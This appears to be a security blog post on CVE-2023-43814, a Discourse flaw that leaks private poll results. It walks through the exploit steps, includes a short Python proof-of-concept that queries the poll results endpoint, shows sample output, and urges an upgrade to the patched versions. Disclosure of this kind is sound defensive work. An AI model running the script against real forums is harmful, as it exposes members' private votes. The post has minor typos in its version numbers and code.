CVE CyberSecurity Database News

CVE-2023-43814 - Private Poll Leaks in Discourse—How Attackers Could See Poll Results Meant to Stay Secret

Poster -

Discourse has become the go-to platform for hosting online forums, Q&As, and community discussions. Its open source flexibility and rich features make it a choice for many organizations and communities. But with popularity comes the risk of security issues—and CVE-2023-43814 is one that hits right at the heart of privacy: private polls.

This post breaks down what CVE-2023-43814 is all about, how it can be exploited, and what you can do to stay safe.

What is Discourse, and What’s Special About Polls?

Discourse allows users to embed polls in posts. These are popular for voting, feedback, and fun. Sometimes, poll results are intended to be private or viewable only by a restricted group (for example, admins or invited members). This encourages more honest answers.

However, a security flaw was discovered that erodes this privacy guarantee.

What Is CVE-2023-43814?

CVE-2023-43814 is a vulnerability in Discourse where attackers who know certain details about a poll within a topic can access the /polls/grouped_poll_results endpoint. By doing this, they can retrieve:

- Poll choices/options

The number of votes each group of participants cast

Even if the poll results were set as "private" (only viewable by authorized users), this endpoint could leak information to unauthorized users.

Impacted Versions: All versions prior to 3.1.1 (Stable) and 3.2..beta2 (Beta).

Severity: Medium (can reveal sensitive community opinions, votes, etc.)

How Does The Exploit Work?

The attacker needs to know some details about the poll they’re targeting (for example, the topic ID and poll name/identifier).

Retrieve Poll Identifiers

By scraping the page or guessing, attacker finds the poll's unique identifier (poll_name or similar) and topic ID.

Send a Request to the Vulnerable Endpoint

They craft a POST request to /polls/grouped_poll_results with the relevant parameters.

Receive Restricted Poll Results

Discourse responds with JSON data containing vote counts and option text, even if the user isn’t allowed to see them.

Let’s see how this could look in code with Python and requests

import requests

# Settings: Replace with your target site info
base_url = "https://YOURDISCOURCEURL";
topic_id = 123          # Replace with the target topic ID
poll_name = "poll1"     # Replace with the poll's identifier

endpoint = f"{base_url}/polls/grouped_poll_results.json"

# Prepare headers as needed (if not logged in, some endpoints may still leak)
payload = {
    "topic_id": topic_id,
    "poll_name": poll_name
}

response = requests.post(endpoint, data=payload)
if response.status_code == 200:
    print("Poll results leaked!")
    print(response.json())
else:
    print("No access or poll not found.")

What Does the Response Look Like?

{
  "results": {
    "options": [
      {"id": 1, "text": "Option A", "votes": 8},
      {"id": 2, "text": "Option B", "votes": 15},
      {"id": 3, "text": "Option C", "votes": 2}
    ]
  }
}

Why Is This a Big Deal?

- Breach of Trust: Members expect their votes or opinions to stay secret in private or delayed-reveal polls. This bug exposes them.
- Sensitive Content Leak: Internal company votes, moderation team elections, or sensitive public sentiment can all be revealed.
- No Workaround: There is no configuration change or “quick fix” to mitigate this. Upgrading Discourse is the only way out.

How Was This Fixed?

The Discourse team released 3.1.1 (Stable) and 3.2..beta2 (Beta) to patch this. The fix adds permission checks to the /polls/grouped_poll_results endpoint, blocking unauthorized access to private poll results.

Upgrade Immediately!

If you manage a Discourse instance, it is critical to upgrade to at least 3.1.1 (Stable branch) or 3.2..beta2 (Beta branch).

No Patch = At Risk

Because there is no workaround, not upgrading leaves your community exposed.

References & Further Reading

- Discourse Security Advisory (Official)
- GitHub Security Advisory for CVE-2023-43814
- CVE details on CVE.org
- Discourse Versions & Upgrade Instructions

Conclusion

CVE-2023-43814 is a plain example of how a seemingly minor oversight can have big privacy consequences. No matter the forum size, if you rely on private polls for sensitive matters, this patch is a must.

Don’t wait. Upgrade your Discourse now and keep your community’s trust.

*Feel free to share this post with your fellow admins and moderators to keep everyone safe!*

Timeline

Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/20/2023 17:48:38 UTC